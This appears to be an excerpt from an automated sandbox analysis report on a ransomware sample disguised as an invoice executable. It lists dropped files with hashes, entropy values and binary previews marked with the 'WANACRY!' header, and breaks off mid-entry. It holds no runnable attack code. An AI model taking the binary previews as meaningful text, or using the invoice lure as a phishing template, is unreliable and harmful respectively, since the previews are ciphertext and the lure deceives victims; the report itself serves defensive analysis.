                                                          SHA-512:72981C9A621AA781501C4BC37F8290A6EF30505F9EE337AC75E214FFDD03902DB617D0E8D3BD058D92CD0A33E8C7E5E166C47EFB6FC598765F572C2C591CD24E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....[..i..hv...=i....89...v.B.am...Zh.-..cl.->.y(.`..........u.3...GD.....>..Fp.E..8.gM....Fb,.+j....(|.#.=-.|+m.as.<ky.. .>r...}j.c.?............&.J7......z9%........n....a,%.v...f._SD7.7.eFe|h.*. .gf.v.....\...2...6.s...3....&ShJ6..(.....Y+.M!4.(\.M.>............{]..g.?..m..a..Q..i....f.}P..:
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999807180634493
                                                          Encrypted:true
                                                          SSDEEP:24576:LQhdHX+VnTyjfTHrhdUeuy1MGCTVp1aDijX/IahA/nbbCs00:LgYVn6nPCTV3ay/PObv00
                                                          MD5:11E17ACDFA91449577F1A2D55FF5EA77
                                                          SHA1:2311CDF9C6BB24AC1273FCD6505581BEDF8688C1
                                                          SHA-256:5407A9073851677F721327115D60BADDD44FB3C1C678EB6EF1CEB9F8C31257F3
                                                          SHA-512:DFA08135CEA3D81003E9EAC726E709E92A8A15728B335D12CDBF382C31662EB90BA30D82FF08B4EA81FBBD301680BD50FA29A607A28417EE582B69B034E2840B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....$P9D.m..{J]_W{..?.....7.V................o.]f...;6...Q.....[M...U,:..i...m.%'..6..... ya..&..]...UK.A.TI...f,.~.<..$.N9R....Z.q..._..-.v....7.|9...?..`S.........E......V..t..>..E.`J.r./ .e&.o..z.E.ra......z>'^......F........J....!.k<-.0d...5B............M.2B.s.[.Q..n..X?..........4a.j..JU...`.i.u......s..^!.`.'k]..(...L.lN...X...w9...Wy5......s...2..@.H`>(.....k;wj^..qn.G..p@..!N..r...8.t.-\u.].e...:.a.[...v.M.......W.0.n...'.......<......M..y.$..7.........zfb......&...$..j.......5......*wID-....?...F.Z....6...w.,.tw..r.#....'.D..u.{+..)...*7[.VY'a...J.....8.y......@..T.H.X.)(2..8(.B9...5.Hq....)..t5.9.'.z..C.jb@a,....I..x./.TNh..y.zK...,..U.-....D.N.5...6C..-;.L{.7c-.>.7./...?.M..w..(.|.A/.P._6)........[...]K..+T<..Y.3.c..F.+..."..I...B..|....c.+1.B.g:O....t..R)1..2KN.53I...4..T./Z5.] ^0.-,s.ez-.?z.^0Q_0.pD9._..,..v.,...}N...-.R.l.%Z.-3f..w.w..F+.6m2.r.rH...U...`>I~f..7.z.....;.#.B...l>.a.....>].V....9..U..YzK.|..f
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.175072900503341
                                                          Encrypted:false
                                                          SSDEEP:6:bkEW0YN8o6Rh7Dv/lQI0c8hO5zU6GQC4ODt+sUFtiUd1UQculV:bkEW0+X63P/l0c8gCQC4O8dbTUQcqV
                                                          MD5:AF83FB2651D3015B5918FC9F50446C40
                                                          SHA1:056780F2A54A2304988886CC9985E8A2AAC1975C
                                                          SHA-256:6F7AAE6723730AA096D60F30D21C32F09C3A5A5F58F5C60A94AD8578A49A752B
                                                          SHA-512:29C116A03D3AEC762892AAC486AE1227473F365A5D0077AFF67D8EFA5506F46D32ABC102689723FD8C1AC33505758AC39E51DF1C45B455F7D211CCA7775E2170
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....*.m9.*|=..RI.u%...2...G...#)....$..e.!......P[..".%Cu@......'ZN..A.b.{e.5.g..K.}...bOt...|.Pe'q..>.Ps...z....6p.-..$..S......&n.#....;.q.x...TR..,..iz.!.^j=f.X']1./M.'...O..Lc....,..A..L..n.rz;|....t....~...R.bD.T.5v.eW...........:h.....u(..?..............)...#Y.b....YbK.......r#.0..?
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3146008
                                                          Entropy (8bit):7.999939773677453
                                                          Encrypted:true
                                                          SSDEEP:98304:Lvme4Tb4kbFadkqPmbQQPLvt/xUGtAye7rWwUSn:Lue4TLZarrcD/1ts7rWDSn
                                                          MD5:227C026DC1938D3352337FA2197E2AF5
                                                          SHA1:CF9FC2B9A45F221CD2E35EDFF27E201D1AAB5F94
                                                          SHA-256:A83B420EF0DC8C9C7EAEA6AA7B022F33708E4C416EBAA3267D51B851396A3CE7
                                                          SHA-512:EEAEBA9F77CFBDAA2E70EB1DFB5058B93D02E02A38381D24409575923822D73D70CA2B743B6686E3CAE29AA1450C84A4A8883CB3588977368C142E8C649569C3
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....s4..'5kd.)...$zB.Q.... ..C6Y..T.....wQnd.yY..B...'..s6.\.O.-7..a..........$L.Q;...d1.E....;U?r.K9....w.M..C*B.(.O.0.?(.f.~.....].=..z.-..4....Mj..F....m^.C..v%...iQ.........s.... .\..nR..!.S.o..>.]&..+~..l.8R.....C..%:xu....'.w.2.7..W.5E..`.^.(...Z......0........wB.:`._....&.@UA;;%..+.....p.......H\n~h...)..D=&..{..L.......#...(.B.^..._...2..f.tQ...."o n.!.A....o...d8h....l..oR..~.X:..&.......'....H............m.GnU.z.T...6[.N.V.B..ar&......)Pe6.F..#.../;....l).K.1.......9...^*./.). l...D...`.zb.....p....z. ..X..or.....R<.......c..R+.8-].-.C....Q...L(.0.'....v8z.X.....r&].3...#.g..b.... ;b...!e..o+.E.....{...=.O"da.......h.b..I-......<]..N..........r..+Q....RUB.lA=..&../..A......'.N..d..d3.W.~..e..+...t..l......Z..hy1.&2....OY<...F...?.m..Y....&..~Z......la..#.4.....*:x.2.s..([.9..S..r.O]1k#.....X..k..N...eyA....~...g..R..' ..J+..m.d.R......I#..O.R...2jL..D...c .<(...f8..la-O&u.N...*.....L.......u.y..\Tf.Z.H........a.T<
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.26980890989177
                                                          Encrypted:false
                                                          SSDEEP:6:bkEauVt3o1GGh8Z1bh9SottHyEkboLtir7h0w3ddL/THyyiUQxa1Cy6:bkEaucGGiXfXAr10odd7THyyixc1CX
                                                          MD5:303D03797428BDD4391E6038A3B31B2A
                                                          SHA1:4304A80289413B14A300B409FE20D7A65D67AF38
                                                          SHA-256:4E159307C5FDBA7AE2250EDC7518F07267400CB4202D844C69575E50E12A30CC
                                                          SHA-512:F72939341403D4FD2D0C00643741700C3CF8B65CE100C7FF83E7E065F6D5801E74FB353AE62516BCF7E92389F0A21EF5CE6F73EED7D5C5DC8B638011EF956737
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....P.k.l.c...1^Q...'m.u.V7H.m...#.)L.....@).u..{ <.x_.PN.6T....<.....^...k..DK}uA6..b.u.....X..j..a.N.k.:?I....$..Kl...G...h..JF...Q_N.....ixP.L..(VDx^...x..........h.fk.&..Oc..u..".!.&y..C.LX3.9Cn.,'.Ka.}.....I..c }..:....O..W..k....c....{5...gly............e.0.D.s.......~......o.......r.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2097432
                                                          Entropy (8bit):7.999915491206557
                                                          Encrypted:true
                                                          SSDEEP:49152:eIEp/9o5rXdbb+u6CLeoPx4F56OrJ1qh2gJJap:eIEplo5BrB5iEOl1qIEcp
                                                          MD5:10E7546DAC27A4B72B332BDA6FA5B433
                                                          SHA1:939DDD8170AC1106FAD9E76C1CE51752E2E1BE38
                                                          SHA-256:81FE1D79B289FCC5334C71EDAAB1EF66AEB526832AED0C18327F31E9C7DF0B16
                                                          SHA-512:5987F3D765925AC4B75454D25D53FFD30638596C52DF81639D93EE6D0320D07D65C626928DCE6E358B288621BF1D74B00E597D5337115ACA15AF411A77397A68
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....G:..v%.d=X.f.XY.#..\Jn.H..%...l.....k...^>..&.t.%b..1Z.i.c4A.i[?..."q.../K.........-..U.9].R Y.=.W.......).:}...T.,..eL...J...qs$P...t.&h.....1......`....5~Z.".....g.J0%/u8.~..0.1.^.8a...x...x.....r............v.+..9.j...H.D.[.nX...C.N...IY...... .....p..$...T..-...L..T..,..h..+.3..=._k. ..?B..pz{.......M1sNw..o.kI......f.?.M..x....T...E...?e.c.A_..2..y..8.M>......PS..+~..79..e..^.... .....t...o,m.7s.......%.%<<&&O..|x.....J....)..|..o.[..../^.V..K........3X....^...|6f....g^...e.=h...!..W...kU...|.Z....7...mS3....+.NA.QD.o`.._._..k....N.>R..C..N.r^.h#8..+....V..J..!..................x.......-.>\..N..2..Q;.........[.BH.F>4.l.W.p.{A,.3...~.Y.zf.G....u...q.......[..N...e.7..G{..r.<.*.8..Q'C{.)%.&..k...M.hJ.-wOg&...|...C84.\"{...l(P:._B[.s....#m.......0.....}..<...)..a..2.XgQ...an...W.....?.PA...v...q$L.......Q..%-....5...C...5d{t.......1..t.].:#..uH.0.....m.)...r..R\..........u.~......o....jc..J<g...*.A...R.... .._..>
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999820846645787
                                                          Encrypted:true
                                                          SSDEEP:24576:GtClQOREBhXT1vr7HSb1EA8+lEdn7yCQgp7SbHI6pjH8XjC58FT/S:GtCln6hEb1EfOWnVQgp7sZZHejC58A
                                                          MD5:885E75691133AA4A093DFE37F396A5F6
                                                          SHA1:77DCF0D62B91918C4B16BD9F7414142E1EF5DE87
                                                          SHA-256:E3A8F15A8B5ADF2A97A96AE396F233013D098A903B9A1292A887421A1A3251F4
                                                          SHA-512:A2AED9714C1418E007AE6B7B8B452066E8DD1E2F622E63B29897ED37DB7B6C1F3E336DC8204DFB136410C02E1C115E87D9E48368D934A5446DC7930F050FA1CB
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....g.Wz.I4.G.s..nF.O..t..{.....j.PD=..*.q..]B..... ..u.m.V6..$n.........f..j.<@O...`I..........<u......D.....W.J...U."..Bv.k-..<..,Z.A..H.......Mq.~...*..YE..o...D..^..c.....<..&.4.a......p@...T._.....O}.....f.. ..Uc+3.o.=r`...*.6Q.vOu.............s._.M.......:pf7....e..7.........:..b.a.z..........9L.}Y.M.7zt. Vq...&z.X.8.%....l. .7xI.f..U.[.?.w#.!.>. .Zi...[.u4.h..sR.o.,.}.9...I.R..>..Du.F.a...(.E...iL?....rO0..Nb....Gh@.....g=.*...#..Zz.Z............t..Yx!.U. w...pN.]Wr...\~.h..~1L.......)m(.U..`@9?a!5....]. .^^.<^....G...^....xK.. \........K..V..1./^.....$......m.bX..q...i.AY!"..&.*..,..q.......E.{.r.8..g..s!.......?V....1....x..S......&.....k`...=.(.v.!..{%{n.~.............).L.rm.....@.w..j.....N.Uo..f<.#............`.K..=k..:BE<<.._.)....;?....lfj.q..}-..E...zL?X..CD....W......IH..m..\WsGv.....I..c.0.x!..o..a_.C.`..w.:....)...C.m.U..W,........C.2.\+..M..D..bGA......\L.....Wa+.u4.[H.r{....r/W..dK.C..-/..\.........
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.221989408165668
                                                          Encrypted:false
                                                          SSDEEP:6:bkE3GbURWSi2dmf9OZ7fzQg8lFWJFpo2bze2M4ecvNVlw/+ThllYmdTA4i:bkE3GEWS+f9Ohrr8fWLpo6LvlAelmmji
                                                          MD5:8A5AEBC1F4E31BB94F234BBC3B9B44A7
                                                          SHA1:E94DAFE8D1EDD35CC23D58EC7502A61467B116D6
                                                          SHA-256:09B5583410211F14B06037050D79EBA659BF35F6F619CEB4A982727CBBF2EFF6
                                                          SHA-512:3ED462060E92F0188411A759A76D6A9B56236596909714178858BE0C6B49560954220CB880E03F59B9AB2A96C6F29B5C0CD543A65D967C6F5AF1D40661E2DC90
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....=..sq.!8sf.C.......e..i,I.T.n.=.L...%...$Z..7.dj...Yh_....=......G...Tj.8...>.V...4|.e{..{.d..@~Q.!h.*..**Gs...@l-..`sL+..KU.BT*.$>;....6.|5.n....B....CEwf0d...tfb@>./.........K...#..;S.....@.e.&...T.......P..`...L.."6.#..|B......Z.}[..#1\.U.(4...............fO..z........F-..K..Z..;.....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.34758026407924
                                                          Encrypted:false
                                                          SSDEEP:6:bkExYQLygCxdUob7gTFBoZaNcU7d4CAYiv2XftJlRzSovcF:bkE3ZC9q+GtcuXf2ovcF
                                                          MD5:5E0652D4CF1E0F3073B0ACF1961FB839
                                                          SHA1:221265C7822749BE8F941C68440FB88D9DA13D9E
                                                          SHA-256:8E78EF4ECD2E7E2FB2CE907A8942455900605CBD7796A34AEF316173BE75CC84
                                                          SHA-512:79A66B6A676D2D3BF0E065EDBADD456630BE77B2F92BFF8D1961E75D206821E503306A228C3A039B3C5DEFC187A86B4BB9663C591E0213FFE082190FD3FD7EC9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......n..8.U-..?:;t...:.......|U.....F.Z@...M..S.v.r.u..z..^..M...o.n.9......[b..+HdD....8.e...Fv..`...\}.M.B..3..j..Zj9........G_R...gO.X7V]p...h.ywt.Q.)y.Vvs..,a4rE.U.g..=.Y.)...K.M.5f.\u.T....n"[g.S.8...T..0.........:7....,2............._...............W..x............s..%..wm......
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.2431662097912834
                                                          Encrypted:false
                                                          SSDEEP:6:bkEvvnh9ZI68ijw7eGRxk5nErgix/oEMixQKgjjkkPKUDsgjUk:bkEv7jcemIErZ/o6xQKTk7AeUk
                                                          MD5:D309395EA6F219676AA25CB11111E175
                                                          SHA1:64FC3758DBF8C029528F324B06D51182EF70BAB0
                                                          SHA-256:BBA72DAE48CAAA2BFDBB09433EA000B52A9599EE446F7177E73F94EB57A58BAA
                                                          SHA-512:0E94A3469384AA1B850760DAC0B44359538864DA14585D4B9E671A1A9EFAFCEC8E79748F3C2FC1103769E64FE5C48193BB74E77D04B46B0D8F7B253F66ED5CF6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......5?....Q.....Q. F*.:..Y.C..].O....9x..b)..{3.^%...)...KA&..0..A..zq...H.z5....4.E#..T...z.....c:.....3.....N`.O..w*.s!..j..!u.<......o....C....6.=fR'........9...:;8.\...-*....`.....X..t5Z..q..@..]).i...U....e4.'6a.lA.%k.L..jc......j...a.<......................(.....]..q.._....E.BF....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.285689097207108
                                                          Encrypted:false
                                                          SSDEEP:6:bkEZIxia0mTHrIyl3Z5ysz6sGye2gyfKX0Q4MNGT18jWgIY:bkEZIxXTlpOs6yet0jmgqRIY
                                                          MD5:5F47A8DA19304B97799DCEE5BDE979F0
                                                          SHA1:652A0AACEC779D1AD3A9EC7F5DC4C559A79FF692
                                                          SHA-256:0EBB3680EBB08CE8B9D62A30049CDFB62F72E8DEDE7331931103648B56C3C3E6
                                                          SHA-512:6944CC034C5723EDB55C29DF6FDD3F7EDB55B5598E9F7EDA3670AFB78ABC643470FD27471839E9BFA653853A7FD2DFA4661DF226253ADEBE90910FE356C74C3B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...... ...$...........M..e..}..h....o.[8.$B......j. ....(~.L.W.@zC..1.,.........@..~..I.V...c..Z.'..".e..<A.9.NK...a.....+14..m.d.....I.V....V.f:.,.i.EU..3........dlQ.;......:.._i...p.-....b.v.....{Y..................F.D&..d....4...f"".#..R................>.Ba/A...].......+..L.x.cuq_+P=
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):58600
                                                          Entropy (8bit):7.996326357278634
                                                          Encrypted:true
                                                          SSDEEP:1536:TUbyK/u+Uu0KXfgJj6PFU2w0Sh3RHs7zwiGJw+FOWBi:Tv4aJ2gJj6Nw0w3Zwzw/Jt3i
                                                          MD5:03084939EBD92085C88EAEC0ECF20C3C
                                                          SHA1:81EDF1CC7C0BCA678E7C337A045DBD27C6F0F626
                                                          SHA-256:C25D73CDA82A382B15C2720C893C3490CBAE86304014B3F01CC08F988CD78C66
                                                          SHA-512:608A09861CBA2912D9BFB7D779EA99D838758AFEC855FDF5A4B59A193BC049623348DE0B20820480015A2A62CEF5FBC0F433742B8BE9E6D624F657B7C1222692
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....r.i..r...ZA...V.{7}.........Sn...<..L)LX.A..dK..#)....o.F>f....A.?b*.uVg.f.%...M.E.i;..0......I..}.]L........-z.).~..+HM.....,..o/...5..N..j(0...:).=.. >.~c.vO.\``....._.kdn..;...1...%.....>..... .........R.N.._.u.q. ..S..../k.p]K.!..">4._.Xr............n....!..,...V..7%cr.Y...tkO..w".Q...9....*..L........].........@.y..d..f9p.U........V..f..L*..r..x..V......KW.U{J..~..n.;..~.$....>.`W.....]z..^..I.b 5.'.Z.u......u.Kq@.4(..T.............../....>....n.7.y..F...O..$.i....w4..E,d....Z.N *@..8.........M.#....+@..2@...N.Lxr.#......5l..].Z......7......E.......i..A....(.6..s.z.F..j......p.x.>..sJ_.g.^..Z...95]8L..B..P!...;..D..Q..]r.g.........>.m...l.e..g..B..eX.AR.)..9..;tXO...i;....!r+^.M. ..D...{.YB..q.....Y3.|.8...`...i.=...".`..!r....G.@..5...z.W...n.}. ......?..=.#3`i$pT..$...]..:...P~e].za.p..E{9.p~......+2A*k....x.7g...v...=" .@.)O.Z........M.<~.?9............L..!B....39>q.....N.m.)..-:c..=*>.......+.;..Xg.N.@....F.c|.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.24745326224425
                                                          Encrypted:false
                                                          SSDEEP:6:bkEZjHCWqspjTA7PwTj94MSvzwS8eTqBLsG424a5zsv9RotiZWQ7:bkEZW4pzTmVvdbELD4la5Aet+7
                                                          MD5:B3706A2EF9A68D3B0F0C00531E573C2D
                                                          SHA1:B4C95FD3C294FABA7966C814B9FFB5A459B010B3
                                                          SHA-256:78BE913525446EF4B2191190507A212B11F7814A303BE208C227AC2F863CD177
                                                          SHA-512:FD8D28B85D111710A61DC2CB7260B56FC074F2E9F1A1BD385164F7C78CC75273530F72EB3D232D8B801B0CEA5E5478A8BB3B79AA4889B3408757ECACB79CE27A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....&..Os.~Bu.R.i.!....>*.......p.e..S...\.Lh.M....m....Sp.".XX..*.o.^...E2.}=..F.|.2...E.....GB..HU..n\...U.....>...:..7E@....N..[.l..f..@..3.yI.0.S.P....\.,....v.....Q.x.wK...p..e+~.Z..Q^.b.'...s..5.|A.s2..I.g..~o..#.c.Qt.m......$y..............$..........|._...J.ZN...K..eB
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.1441662029840485
                                                          Encrypted:false
                                                          SSDEEP:6:bkEaR4OPQ0mFrcPQ5YSIwM3YoaAsN7foMBrv8QkfRMdRv7vF:bkEa6w3mFIPcJhN1rv8QgR0NF
                                                          MD5:DE48D88AE01D5EE9DA0D5D21E91B88C4
                                                          SHA1:17A76374E6CD733DC940B46F768B5CA92B31E4D4
                                                          SHA-256:5ED2237D5EA084882646689047A68BCA4AB127800FAE4FB9D8C54BDD05014717
                                                          SHA-512:831E8506B8DC1EB33EE950F9CB2443196E7850D16495BC32A68AA0E7C32E01E2403142D84B45416E8707E1068787AE082F614ADBB3F4D85795E96B4491BB3B8D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....{..X.I.zg.....e..M.Q.\+`s[...t...h.[.........N......+...yL.F..B..?..E....t.%".h.7.....h.x.!....;...2....O.;.........#...).i.*.q....>..!@..)8a.b/S..ff.8.../ln.r.u...J.4.dK...X..29.E.@.e.k...).....jj.r..b...qu.L.K.-.n....J...S.mq.LR?...........!..N............J{W!0F....@.!......=.qy..[j.I...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.221937557171516
                                                          Encrypted:false
                                                          SSDEEP:6:bkEdO8W6olIXLhefuCPrVbQIf7GqdHjBPbBK0uAQkSBO:bkE0961LhWuYrVcIGqhBPb8XffO
                                                          MD5:CD5D0CBB6412E5F98D523AE12D22649F
                                                          SHA1:1B66213B3C495AEB9BE0F9DB3672DAC376AAAA96
                                                          SHA-256:98020AD11DB815E712CB460A6BDC140A68379F8F466284B8B91A1D747DB2B848
                                                          SHA-512:C52783447CCC285F7768AA0E4E404953114F2801639658F879ECB557D8597085136D4ED86F6B1C3B529253320254FDC5AE88F560D4621AA3FA73C58F906FDF95
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....t....8..M....Q...]..........t...r.4^vv....#,f.......:_._DM...S.<#..X........ Y..H...lL".!...;....b.N..\.~..R.....\...m .|Q.l.T. F.dV.zoiN.+_.4w....aE}^2...@.vB..J..zW.....\Q..d...&.{.....$.`G..w.Zf#.q..i.N.......&#_.%.C...\......Q.....G(.....*.g................D.X2..Dh..M.....`../..[a..s.k
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.157338268971449
                                                          Encrypted:false
                                                          SSDEEP:6:bkETTn7uGEzSZYGqlmURPwjBiQfoaaPlop6LvwQpv6jGEncV:bkETTn7zEzdGxQPwYkslyUvwQpv6yEnW
                                                          MD5:5FC81FCA275F26CFA93D597C6BD2EA39
                                                          SHA1:D3CFE67710F12413185BFA11849CA584F81B642D
                                                          SHA-256:CA888D49179961FB2FACD0746B8A785C6C293188A96409908C8BC978BEFBDE4C
                                                          SHA-512:2A64DFFB7F5CA130985EC5436226FD28FD2AABE6F68ED0E5398C8D40513E1DDE82B02FA18FDE74E86EFC2F93FBC61913F0505FAD2DBD47C39944F95A3AFBD79F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....S..^y......3..o..,.......*.......k.?<yQn....X<.....U..n......q.J.....rqe]D*.f...j/x.........I...c...."B".n...].9kf......t.[..^D.q..}.......7...sa..C..U+o*Gma.p.R....".....{|>gy.`..8.%q....Fb.t.....c..2J..E>.Yx........G...La.q..m.%..']x.p...Z.N1..Y...............e....w...I.......N.!.R.....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999862052207
                                                          Encrypted:true
                                                          SSDEEP:24576:z41MnDUgyv2ujySEA6UuR2kL6GMCKMlq9Oyey6E:lnDAaSEAsIihMCKbF
                                                          MD5:7CDA6445A180ED78562874419F4FD099
                                                          SHA1:9A9A6A257CEAAE0CC6176CC473DCEEA67756EC6C
                                                          SHA-256:39526CF710DDB5E2E5D0C0988EAE1E3EA532C9A2D5A2F42C26E353C0F249D0B9
                                                          SHA-512:502886ED50AEF15D423B944544C69B514BA494D2854A29F1FA2099C74A09A6D371F1A5863FF2C4E6B129AF49716E0134B1DEBFC1BEB2D044658F8CF66650192F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....dQb9.QU....&VD..:um6V...!._.^ .\|XX..".....8..c._>1..a.....8.v.EoK0........8.<,.i.W....|.Z%...@.rbd.U..d.....W..0b8e..-..m.......^g.F..s...=.H.$E._5K.|.$w/..Q.\...@..q...y.[p....J...TQg...d.2.T..-qG........Z...X...+I..Qf........L....R.F@.................[E.A.H.X..}.1.5.>.b...Ms=4.M..;k..%FD.^....L.v..V..<.S.......5A.+.u...Ej.....h......i....Pv.`L.|X7.D.K.1kW~..B..;......{.q";.....E..vS.1.;...u..j..1.u....=.iI-r.....6.......N..{.i...OP_-...r.@0.y...&...}V.....^.L......5j.TM...O.G..44d..7K....qk{?.~/b....6j........#I.;.......nIj....AA%..../ 1..7.E......||*.............\..[.......W............xsu.......\...........P...B...1g.......e5$.1HO....I5..@....D3.......L.q...6A9.0..%....7..].E.xd./......Y".........$.7...7.0...>."+O.<..o....^L8Y*"$q}f.R..t@...Sg..H(....97$`..|...U.Q...J.0..~@.C.S..7......'...Le..{.{...Q&mY,.wv.......!..I..h.s..M%.8?...c.)..Rmy...._..~...0V.....fg.....k...././...&....gXq.W...a..Cf..<]I.ds.ER\.%.,.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.23081917580081
                                                          Encrypted:false
                                                          SSDEEP:6:bkEMtOMoL/rLN69TuhCBNKvJacF/vmcex5xjym2Psy2dcF:bkEMwMw/DQqJ9JecG5x5tjdcF
                                                          MD5:2AE4559FAA47DC3B9281B2E7FAD9F997
                                                          SHA1:04AD827A18F704979C84B8F17852108CFC4966F5
                                                          SHA-256:E7D0E4BB5CC391308743A849AB3B3ADD1936E693AE6A91638E4F63442D55E296
                                                          SHA-512:F767683A8CA2AFAACE441381EB44C4B9B1667CF20EA34A992194FBA0C150335668B5991C0839E3FA8C00E81FE3F6590499C822FFA8E6C5A7022F2C7A325FAE65
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....A.|o...WZ'...*a...{6.>..%4.FJ.[.R......~...o\=i3/UZ.hN.{.._...?.R.H.Y..j<B<..d+C0...=..t=hG._.....O...6..OZ....o_...(/6......1F>c`..[.f.1.`L.x.......dz^...,..(..+.$.>%h8.x.Q...H.._.L+...e..o;....99_...T+.z...$.k..w..e.t....'7......L.......c.?...............z.:....v.t...gl....@...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999840312041892
                                                          Encrypted:true
                                                          SSDEEP:24576:0PjjjRWD9kF5rfuPXzOIuVBvK6kODqIJCl7GBtbbhjEXV:wjMpkF5DKuVBvTk54CABt2l
                                                          MD5:E7D05C4CC49F6CEF61597901E3F461EA
                                                          SHA1:B682F7FA28DB7C15BD6E73C1E07A6427EC721164
                                                          SHA-256:AE31AC0D47B06A544C73A50E35410684E46C7B999D382B73856FA7A605EF6BA2
                                                          SHA-512:67437539F04B3675E29763ABC2E1AA2DFAE2A1268221CEDA6240042710DDB741936FBE37274E2B322B0C85A08B8D9A45B2D24D52FA910C8396C1D1DE00847A30
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......d.O.v..)...F.+.5.3..9......d..)......4.2.7..y.....Ay.).?.....l....KQ.:]....L...... x.$$..f..(.C..V$Y...k....c.JI.......QK.....q......L:..B......f.0..\J*.....G...!B..h...p.x.%...6.....+.%L..7X.....Tz.EU....;.$"......>7Si..:c...x.+w..p/~>.................j...4.B...h|... .sY/.9wD.%..e..\#<]L6..\..wR.6.V..|).i.w.0. ....[.../66..Q...R}S.M.5....B....yE=XNo_S.(v.}.........%..........q<....:E=5J...u..b....x...$C.o.`.,..].M..p.Xe....m]Q..I.)....%.....<Q.yT.....C...U..yN...oU.L9...b....@8..,..W@H;eLa....j[hY...g..A...(....e.c..N...Z.E.FJ.........G@..4..?..R..}.c.y...%...o>..iQ.g.p|bO(.V...Xh....Z....K.:..~.x{..$.../.rv3.W..@O.J...1..g..'DH.V.i....M.._6O.BDOg.$5Z].?........w...~.0. ...C.>B.7.GUY...FX.}..`R...;;n;".}....#.;..i+..;A...Z...]n?.R\.d..UM..:.....-......*v_.Q.............hx...-.;3".P....0.yJ......E.rK..L..O&n..7.2s...o.p..N9.}..5.p..q.Xz...s....O......`g.. .q.1.^.*...)..@...A..yf.(S\...K..Y.WG..#.C...G,B....@i.....$.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.1660764484283135
                                                          Encrypted:false
                                                          SSDEEP:6:bkERFGTKbGnyFRzJtG6gYj5pBf3EcNp1PtXq5OI:bkEonyblVflDfVNPlLI
